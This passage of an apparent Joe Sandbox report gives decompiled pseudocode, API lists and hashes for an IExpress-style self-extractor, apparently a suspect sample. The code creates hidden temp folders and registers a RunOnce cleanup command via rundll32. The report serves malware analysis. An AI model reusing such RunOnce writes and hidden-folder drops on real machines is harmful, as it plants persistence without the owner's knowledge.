                                                          					E010C658A( &_v528, _t84, "advpack.dll");
                                                          					_t46 = LoadLibraryA( &_v528); // executed
                                                          					_t84 = _t46;
                                                          					if(_t84 == 0) {
                                                          						L10:
                                                          						if(GetModuleFileNameA( *0x10c9a3c,  &_v268, 0x104) == 0) {
                                                          							L17:
                                                          							_t36 = RegCloseKey(_v532);
                                                          							L23:
                                                          							_pop(_t86);
                                                          							goto L24;
                                                          						}
                                                          						L11:
                                                          						_t72 =  &_v268;
                                                          						_t80 = _t72 + 1;
                                                          						do {
                                                          							_t49 =  *_t72;
                                                          							_t72 = _t72 + 1;
                                                          						} while (_t49 != 0);
                                                          						_t73 = _t72 - _t80;
                                                          						_t81 = 0x10c91e4;
                                                          						do {
                                                          							_t50 =  *_t81;
                                                          							_t81 = _t81 + 1;
                                                          						} while (_t50 != 0);
                                                          						_t84 = _t73 + 0x50 + _t81 - 0x10c91e5;
                                                          						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x10c91e5);
                                                          						if(_t90 != 0) {
                                                          							 *0x10c8580 = _t66 ^ 0x00000001;
                                                          							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                          							if(_t66 == 0) {
                                                          								_t54 = "%s /D:%s";
                                                          							}
                                                          							_push("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                          							E010C171E(_t90, _t84, _t54,  &_v268);
                                                          							_t75 = _t90;
                                                          							_t23 = _t75 + 1; // 0x1
                                                          							_t79 = _t23;
                                                          							do {
                                                          								_t56 =  *_t75;
                                                          								_t75 = _t75 + 1;
                                                          							} while (_t56 != 0);
                                                          							_t24 = _t75 - _t79 + 1; // 0x2
                                                          							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                          							RegCloseKey(_v532); // executed
                                                          							_t36 = LocalFree(_t90);
                                                          							goto L23;
                                                          						}
                                                          						_t79 = 0x4b5;
                                                          						E010C44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                          						goto L17;
                                                          					}
                                                          					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                          					_t66 = 0 | _t91 != 0x00000000;
                                                          					FreeLibrary(_t84); // executed
                                                          					if(_t91 == 0) {
                                                          						goto L10;
                                                          					}
                                                          					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                          						E010C658A( &_v268, 0x104, 0x10c1140);
                                                          					}
                                                          					goto L11;
                                                          				}
                                                          				_t36 = RegCloseKey(_v532);
                                                          				 *0x10c8530 = _t66;
                                                          				goto L23;
                                                          			}


































                                                          APIs
                                                          • memset.MSVCRT ref: 010C2050
                                                          • memset.MSVCRT ref: 010C205F
                                                          • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 010C208C
                                                            • Part of subcall function 010C171E: _vsnprintf.MSVCRT ref: 010C1750
                                                          • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010C20C9
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010C20EA
                                                          • GetSystemDirectoryA.KERNEL32 ref: 010C2103
                                                          • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010C2122
                                                          • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 010C2134
                                                          • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010C2144
                                                          • GetSystemDirectoryA.KERNEL32 ref: 010C215B
                                                          • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010C218C
                                                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010C21C1
                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010C21E4
                                                          • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 010C223D
                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010C2249
                                                          • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 010C2250
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                          • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                          • API String ID: 178549006-1709460465
                                                          • Opcode ID: 6e06338b3a4bccd12718eef862f43889bc38359744a9c494531049e605f331c0
                                                          • Instruction ID: 5e096f3e883f4803353cffa39cfeb05f9d91d828cb1a9a4c81fa27ee135cd5aa
                                                          • Opcode Fuzzy Hash: 6e06338b3a4bccd12718eef862f43889bc38359744a9c494531049e605f331c0
                                                          • Instruction Fuzzy Hash: AA511375A00218AFDB309B24DC48FEE7B6CEB90B40F1041ADBEC9E7145EA7699448F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 232 10c55a0-10c55d9 call 10c468f LocalAlloc 235 10c55fd-10c560c call 10c468f 232->235 236 10c55db-10c55f1 call 10c44b9 call 10c6285 232->236 242 10c560e-10c5630 call 10c44b9 LocalFree 235->242 243 10c5632-10c5643 lstrcmpA 235->243 251 10c55f6-10c55f8 236->251 242->251 245 10c564b-10c5659 LocalFree 243->245 246 10c5645 243->246 249 10c565b-10c565d 245->249 250 10c5696-10c569c 245->250 246->245 252 10c565f-10c5667 249->252 253 10c5669 249->253 255 10c589f-10c58b5 call 10c6517 250->255 256 10c56a2-10c56a8 250->256 254 10c58b7-10c58c7 call 10c6ce0 251->254 252->253 258 10c566b-10c567a call 10c5467 252->258 253->258 255->254 256->255 257 10c56ae-10c56c1 GetTempPathA 256->257 261 10c56f3-10c5711 call 10c1781 257->261 262 10c56c3-10c56c9 call 10c5467 257->262 270 10c589b-10c589d 258->270 271 10c5680-10c5691 call 10c44b9 258->271 275 10c586c-10c5890 GetWindowsDirectoryA call 10c597d 261->275 276 10c5717-10c5729 GetDriveTypeA 261->276 269 10c56ce-10c56d0 262->269 269->270 273 10c56d6-10c56df call 10c2630 269->273 270->254 271->251 273->261 288 10c56e1-10c56ed call 10c5467 273->288 275->261 289 10c5896 275->289 280 10c572b-10c572e 276->280 281 10c5730-10c5740 GetFileAttributesA 276->281 280->281 283 10c5742-10c5745 280->283 282 10c577e-10c578f call 10c597d 281->282 281->283 298 10c5791-10c579e call 10c2630 282->298 299 10c57b2-10c57bf call 10c2630 282->299 286 10c576b 283->286 287 10c5747-10c574f 283->287 291 10c5771-10c5779 286->291 287->291 292 10c5751-10c5753 287->292 288->261 288->270 289->270 296 10c5864-10c5866 291->296 292->291 295 10c5755-10c5762 call 10c6952 292->295 295->286 308 10c5764-10c5769 295->308 296->275 296->276 298->286 309 10c57a0-10c57b0 call 10c597d 298->309 306 10c57c1-10c57cd GetWindowsDirectoryA 299->306 307 10c57d3-10c57f8 call 10c658a GetFileAttributesA 299->307 306->307 314 10c580a 307->314 315 10c57fa-10c5808 CreateDirectoryA 307->315 308->282 308->286 309->286 309->299 
316 10c580d-10c580f 314->316 315->316 317 10c5827-10c585c SetFileAttributesA call 10c1781 call 10c5467 316->317 318 10c5811-10c5825 316->318 317->270 323 10c585e 317->323 318->296 323->296
                                                          C-Code - Quality: 92%
                                                          			E010C55A0(void* __eflags) {
                                                          				signed int _v8;
                                                          				char _v265;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t28;
                                                          				int _t32;
                                                          				int _t33;
                                                          				int _t35;
                                                          				signed int _t36;
                                                          				signed int _t38;
                                                          				int _t40;
                                                          				int _t44;
                                                          				long _t48;
                                                          				int _t49;
                                                          				int _t50;
                                                          				signed int _t53;
                                                          				int _t54;
                                                          				int _t59;
                                                          				char _t60;
                                                          				int _t65;
                                                          				char _t66;
                                                          				int _t67;
                                                          				int _t68;
                                                          				int _t69;
                                                          				int _t70;
                                                          				int _t71;
                                                          				struct _SECURITY_ATTRIBUTES* _t72;
                                                          				int _t73;
                                                          				CHAR* _t82;
                                                          				CHAR* _t88;
                                                          				void* _t103;
                                                          				signed int _t110;
                                                          
                                                          				_t28 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t28 ^ _t110;
                                                          				_t2 = E010C468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                          				_t109 = LocalAlloc(0x40, _t2);
                                                          				if(_t109 != 0) {
                                                          					_t82 = "RUNPROGRAM";
                                                          					_t32 = E010C468F(_t82, _t109, 1);
                                                          					__eflags = _t32;
                                                          					if(_t32 != 0) {
                                                          						_t33 = lstrcmpA(_t109, "<None>");
                                                          						__eflags = _t33;
                                                          						if(_t33 == 0) {
                                                          							 *0x10c9a30 = 1;
                                                          						}
                                                          						LocalFree(_t109);
                                                          						_t35 =  *0x10c8b3e; // 0x0
                                                          						__eflags = _t35;
                                                          						if(_t35 == 0) {
                                                          							__eflags =  *0x10c8a24; // 0x0
                                                          							if(__eflags != 0) {
                                                          								L46:
                                                          								_t101 = 0x7d2;
                                                          								_t36 = E010C6517(_t82, 0x7d2, 0, E010C3210, 0, 0);
                                                          								asm("sbb eax, eax");
                                                          								_t38 =  ~( ~_t36);
                                                          							} else {
                                                          								__eflags =  *0x10c9a30; // 0x0
                                                          								if(__eflags != 0) {
                                                          									goto L46;
                                                          								} else {
                                                          									_t109 = 0x10c91e4;
                                                          									_t40 = GetTempPathA(0x104, 0x10c91e4);
                                                          									__eflags = _t40;
                                                          									if(_t40 == 0) {
                                                          										L19:
                                                          										_push(_t82);
                                                          										E010C1781( &_v268, 0x104, _t82, "A:\\");
                                                          										__eflags = _v268 - 0x5a;
                                                          										if(_v268 <= 0x5a) {
                                                          											do {
                                                          												_t109 = GetDriveTypeA( &_v268);
                                                          												__eflags = _t109 - 6;
                                                          												if(_t109 == 6) {
                                                          													L22:
                                                          													_t48 = GetFileAttributesA( &_v268);
                                                          													__eflags = _t48 - 0xffffffff;
                                                          													if(_t48 != 0xffffffff) {
                                                          														goto L30;
                                                          													} else {
                                                          														goto L23;
                                                          													}
                                                          												} else {
                                                          													__eflags = _t109 - 3;
                                                          													if(_t109 != 3) {
                                                          														L23:
                                                          														__eflags = _t109 - 2;
                                                          														if(_t109 != 2) {
                                                          															L28:
                                                          															_t66 = _v268;
                                                          															goto L29;
                                                          														} else {
                                                          															_t66 = _v268;
                                                          															__eflags = _t66 - 0x41;
                                                          															if(_t66 == 0x41) {
                                                          																L29:
                                                          																_t60 = _t66 + 1;
                                                          																_v268 = _t60;
                                                          																goto L42;
                                                          															} else {
                                                          																__eflags = _t66 - 0x42;
                                                          																if(_t66 == 0x42) {
                                                          																	goto L29;
                                                          																} else {
                                                          																	_t68 = E010C6952( &_v268);
                                                          																	__eflags = _t68;
                                                          																	if(_t68 == 0) {
                                                          																		goto L28;
                                                          																	} else {
                                                          																		__eflags = _t68 - 0x19000;
                                                          																		if(_t68 >= 0x19000) {
                                                          																			L30:
                                                          																			_push(0);
                                                          																			_t103 = 3;
                                                          																			_t49 = E010C597D( &_v268, _t103, 1);
                                                          																			__eflags = _t49;
                                                          																			if(_t49 != 0) {
                                                          																				L33:
                                                          																				_t50 = E010C2630(0,  &_v268, 1);
                                                          																				__eflags = _t50;
                                                          																				if(_t50 != 0) {
                                                          																					GetWindowsDirectoryA( &_v268, 0x104);
                                                          																				}
                                                          																				_t88 =  &_v268;
                                                          																				E010C658A(_t88, 0x104, "msdownld.tmp");
                                                          																				_t53 = GetFileAttributesA( &_v268);
                                                          																				__eflags = _t53 - 0xffffffff;
                                                          																				if(_t53 != 0xffffffff) {
                                                          																					_t54 = _t53 & 0x00000010;
                                                          																					__eflags = _t54;
                                                          																				} else {
                                                          																					_t54 = CreateDirectoryA( &_v268, 0);
                                                          																				}
                                                          																				__eflags = _t54;
                                                          																				if(_t54 != 0) {
                                                          																					SetFileAttributesA( &_v268, 2);
                                                          																					_push(_t88);
                                                          																					_t109 = 0x10c91e4;
                                                          																					E010C1781(0x10c91e4, 0x104, _t88,  &_v268);
                                                          																					_t101 = 1;
                                                          																					_t59 = E010C5467(0x10c91e4, 1, 0);
                                                          																					__eflags = _t59;
                                                          																					if(_t59 != 0) {
                                                          																						goto L45;
                                                          																					} else {
                                                          																						_t60 = _v268;
                                                          																						goto L42;
                                                          																					}
                                                          																				} else {
                                                          																					_t60 = _v268 + 1;
                                                          																					_v265 = 0;
                                                          																					_v268 = _t60;
                                                          																					goto L42;
                                                          																				}
                                                          																			} else {
                                                          																				_t65 = E010C2630(0,  &_v268, 1);
                                                          																				__eflags = _t65;
                                                          																				if(_t65 != 0) {
                                                          																					goto L28;
                                                          																				} else {
                                                          																					_t67 = E010C597D( &_v268, 1, 1, 0);
                                                          																					__eflags = _t67;
                                                          																					if(_t67 == 0) {
                                                          																						goto L28;
                                                          																					} else {
                                                          																						goto L33;
                                                          																					}
                                                          																				}
                                                          																			}
                                                          																		} else {
                                                          																			goto L28;
                                                          																		}
                                                          																	}
                                                          																}
                                                          															}
                                                          														}
                                                          													} else {
                                                          														goto L22;
                                                          													}
                                                          												}
                                                          												goto L47;
                                                          												L42:
                                                          												__eflags = _t60 - 0x5a;
                                                          											} while (_t60 <= 0x5a);
                                                          										}
                                                          										goto L43;
                                                          									} else {
                                                          										_t101 = 1;
                                                          										_t69 = E010C5467(0x10c91e4, 1, 3); // executed
                                                          										__eflags = _t69;
                                                          										if(_t69 != 0) {
                                                          											goto L45;
                                                          										} else {
                                                          											_t82 = 0x10c91e4;
                                                          											_t70 = E010C2630(0, 0x10c91e4, 1);
                                                          											__eflags = _t70;
                                                          											if(_t70 != 0) {
                                                          												goto L19;
                                                          											} else {
                                                          												_t101 = 1;
                                                          												_t82 = 0x10c91e4;
                                                          												_t71 = E010C5467(0x10c91e4, 1, 1);
                                                          												__eflags = _t71;
                                                          												if(_t71 != 0) {
                                                          													goto L45;
                                                          												} else {
                                                          													do {
                                                          														goto L19;
                                                          														L43:
                                                          														GetWindowsDirectoryA( &_v268, 0x104);
                                                          														_push(4);
                                                          														_t101 = 3;
                                                          														_t82 =  &_v268;
                                                          														_t44 = E010C597D(_t82, _t101, 1);
                                                          														__eflags = _t44;
                                                          													} while (_t44 != 0);
                                                          													goto L2;
                                                          												}
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						} else {
                                                          							__eflags = _t35 - 0x5c;
                                                          							if(_t35 != 0x5c) {
                                                          								L10:
                                                          								_t72 = 1;
                                                          							} else {
                                                          								__eflags =  *0x10c8b3f - _t35; // 0x0
                                                          								_t72 = 0;
                                                          								if(__eflags != 0) {
                                                          									goto L10;
                                                          								}
                                                          							}
                                                          							_t101 = 0;
                                                          							_t73 = E010C5467(0x10c8b3e, 0, _t72);
                                                          							__eflags = _t73;
                                                          							if(_t73 != 0) {
                                                          								L45:
                                                          								_t38 = 1;
                                                          							} else {
                                                          								_t101 = 0x4be;
                                                          								E010C44B9(0, 0x4be, 0, 0, 0x10, 0);
                                                          								goto L2;
                                                          							}
                                                          						}
                                                          					} else {
                                                          						_t101 = 0x4b1;
                                                          						E010C44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          						LocalFree(_t109);
                                                          						 *0x10c9124 = 0x80070714;
                                                          						goto L2;
                                                          					}
                                                          				} else {
                                                          					_t101 = 0x4b5;
                                                          					E010C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          					 *0x10c9124 = E010C6285();
                                                          					L2:
                                                          					_t38 = 0;
                                                          				}
                                                          				L47:
                                                          				return E010C6CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                          			}





































                                                          0x010c575b
                                                          0x010c5760
                                                          0x010c5762
                                                          0x00000000
                                                          0x010c5764
                                                          0x010c5764
                                                          0x010c5769
                                                          0x010c577e
                                                          0x010c577e
                                                          0x010c5781
                                                          0x010c5788
                                                          0x010c578d
                                                          0x010c578f
                                                          0x010c57b2
                                                          0x010c57b8
                                                          0x010c57bd
                                                          0x010c57bf
                                                          0x010c57cd
                                                          0x010c57cd
                                                          0x010c57dd
                                                          0x010c57e3
                                                          0x010c57ef
                                                          0x010c57f5
                                                          0x010c57f8
                                                          0x010c580a
                                                          0x010c580a
                                                          0x010c57fa
                                                          0x010c5802
                                                          0x010c5802
                                                          0x010c580d
                                                          0x010c580f
                                                          0x010c5830
                                                          0x010c5836
                                                          0x010c583d
                                                          0x010c584b
                                                          0x010c5851
                                                          0x010c5855
                                                          0x010c585a
                                                          0x010c585c
                                                          0x00000000
                                                          0x010c585e
                                                          0x010c585e
                                                          0x00000000
                                                          0x010c585e
                                                          0x010c5811
                                                          0x010c5817
                                                          0x010c5819
                                                          0x010c581f
                                                          0x00000000
                                                          0x010c581f
                                                          0x010c5791
                                                          0x010c5797
                                                          0x010c579c
                                                          0x010c579e
                                                          0x00000000
                                                          0x010c57a0
                                                          0x010c57a9
                                                          0x010c57ae
                                                          0x010c57b0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c57b0
                                                          0x010c579e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c5769
                                                          0x010c5762
                                                          0x010c5753
                                                          0x010c574f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c572e
                                                          0x00000000
                                                          0x010c5864
                                                          0x010c5864
                                                          0x010c5864
                                                          0x010c5717
                                                          0x00000000
                                                          0x010c56c3
                                                          0x010c56c5
                                                          0x010c56c9
                                                          0x010c56ce
                                                          0x010c56d0
                                                          0x00000000
                                                          0x010c56d6
                                                          0x010c56d6
                                                          0x010c56d8
                                                          0x010c56dd
                                                          0x010c56df
                                                          0x00000000
                                                          0x010c56e1
                                                          0x010c56e2
                                                          0x010c56e4
                                                          0x010c56e6
                                                          0x010c56eb
                                                          0x010c56ed
                                                          0x00000000
                                                          0x010c56f3
                                                          0x010c56f3
                                                          0x00000000
                                                          0x010c586c
                                                          0x010c5878
                                                          0x010c587e
                                                          0x010c5882
                                                          0x010c5883
                                                          0x010c5889
                                                          0x010c588e
                                                          0x010c588e
                                                          0x00000000
                                                          0x010c5896
                                                          0x010c56ed
                                                          0x010c56df
                                                          0x010c56d0
                                                          0x010c56c1
                                                          0x010c56a8
                                                          0x010c565b
                                                          0x010c565b
                                                          0x010c565d
                                                          0x010c5669
                                                          0x010c5669
                                                          0x010c565f
                                                          0x010c565f
                                                          0x010c5665
                                                          0x010c5667
                                                          0x00000000
                                                          0x00000000
                                                          0x010c5667
                                                          0x010c566c
                                                          0x010c5673
                                                          0x010c5678
                                                          0x010c567a
                                                          0x010c589b
                                                          0x010c589b
                                                          0x010c5680
                                                          0x010c5685
                                                          0x010c568c
                                                          0x00000000
                                                          0x010c568c
                                                          0x010c567a
                                                          0x010c560e
                                                          0x010c5613
                                                          0x010c561a
                                                          0x010c5620
                                                          0x010c5626
                                                          0x00000000
                                                          0x010c5626
                                                          0x010c55db
                                                          0x010c55e0
                                                          0x010c55e7
                                                          0x010c55f1
                                                          0x010c55f6
                                                          0x010c55f6
                                                          0x010c55f6
                                                          0x010c58b7
                                                          0x010c58c7

                                                          APIs
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46A0
                                                            • Part of subcall function 010C468F: SizeofResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46A9
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46C3
                                                            • Part of subcall function 010C468F: LoadResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46CC
                                                            • Part of subcall function 010C468F: LockResource.KERNEL32(00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46D3
                                                            • Part of subcall function 010C468F: memcpy_s.MSVCRT ref: 010C46E5
                                                            • Part of subcall function 010C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46EF
                                                          • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 010C55CF
                                                          • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 010C5638
                                                          • LocalFree.KERNEL32(00000000), ref: 010C564C
                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010C5620
                                                            • Part of subcall function 010C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                            • Part of subcall function 010C44B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
                                                            • Part of subcall function 010C6285: GetLastError.KERNEL32(010C5BBC), ref: 010C6285
                                                          • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010C56B9
                                                          • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 010C571E
                                                          • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 010C5737
                                                          • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 010C57CD
                                                          • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 010C57EF
                                                          • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 010C5802
                                                            • Part of subcall function 010C2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 010C2654
                                                          • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 010C5830
                                                            • Part of subcall function 010C6517: FindResourceA.KERNEL32(010C0000,000007D6,00000005), ref: 010C652A
                                                            • Part of subcall function 010C6517: LoadResource.KERNEL32(010C0000,00000000,?,?,010C2EE8,00000000,010C19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010C6538
                                                            • Part of subcall function 010C6517: DialogBoxIndirectParamA.USER32(010C0000,00000000,00000547,010C19E0,00000000), ref: 010C6557
                                                            • Part of subcall function 010C6517: FreeResource.KERNEL32(00000000,?,?,010C2EE8,00000000,010C19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010C6560
                                                          • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 010C5878
                                                            • Part of subcall function 010C597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 010C59A8
                                                            • Part of subcall function 010C597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 010C59AF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                          • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                          • API String ID: 2436801531-559629209
                                                          • Opcode ID: 027df6e3eea2222926ffbab15b479a3eb66bb536b5db0c094228d1bf3ea7d120
                                                          • Instruction ID: 46f276ea39477bd13d785282053d30eb576c534751355fdb18af8fe22329e958
                                                          • Opcode Fuzzy Hash: 027df6e3eea2222926ffbab15b479a3eb66bb536b5db0c094228d1bf3ea7d120
                                                          • Instruction Fuzzy Hash: 0B812778B042059ADB719B799C44BEF76ADAB64B40F0001ADF5C6E3181EE74ADC58F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          C-Code - Quality: 95%
                                                          			E010C53A1(CHAR* __ecx, CHAR* __edx) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t5;
                                                          				long _t13;
                                                          				int _t14;
                                                          				CHAR* _t20;
                                                          				int _t29;
                                                          				int _t30;
                                                          				CHAR* _t32;
                                                          				signed int _t33;
                                                          				void* _t34;
                                                          
                                                          				_t5 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t5 ^ _t33;
                                                          				_t32 = __edx;
                                                          				_t20 = __ecx;
                                                          				_t29 = 0;
                                                          				while(1) {
                                                          					E010C171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                          					_t34 = _t34 + 0x10;
                                                          					_t29 = _t29 + 1;
                                                          					E010C1680(_t32, 0x104, _t20);
                                                          					E010C658A(_t32, 0x104,  &_v268); // executed
                                                          					RemoveDirectoryA(_t32); // executed
                                                          					_t13 = GetFileAttributesA(_t32); // executed
                                                          					if(_t13 == 0xffffffff) {
                                                          						break;
                                                          					}
                                                          					if(_t29 < 0x190) {
                                                          						continue;
                                                          					}
                                                          					L3:
                                                          					_t30 = 0;
                                                          					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                          						_t30 = 1;
                                                          						DeleteFileA(_t32);
                                                          						CreateDirectoryA(_t32, 0);
                                                          					}
                                                          					L5:
                                                          					return E010C6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                          				}
                                                          				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                          				if(_t14 == 0) {
                                                          					goto L3;
                                                          				}
                                                          				_t30 = 1;
                                                          				 *0x10c8a20 = 1;
                                                          				goto L5;
                                                          			}


















                                                          APIs
                                                            • Part of subcall function 010C171E: _vsnprintf.MSVCRT ref: 010C1750
                                                          • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C53FB
                                                          • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C5402
                                                          • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C541F
                                                          • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C542B
                                                          • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C5434
                                                          • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C5452
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                          • API String ID: 1082909758-2659685179
                                                          • Opcode ID: e53b9d72768c88d7da286bf33e45aa9003f9f5f60ff538faa812171ae7b85d0f
                                                          • Instruction ID: 5238f167157bb263ecfd1831a8579ae48407a87f8a429d7f48bb31c71a802bfb
                                                          • Opcode Fuzzy Hash: e53b9d72768c88d7da286bf33e45aa9003f9f5f60ff538faa812171ae7b85d0f
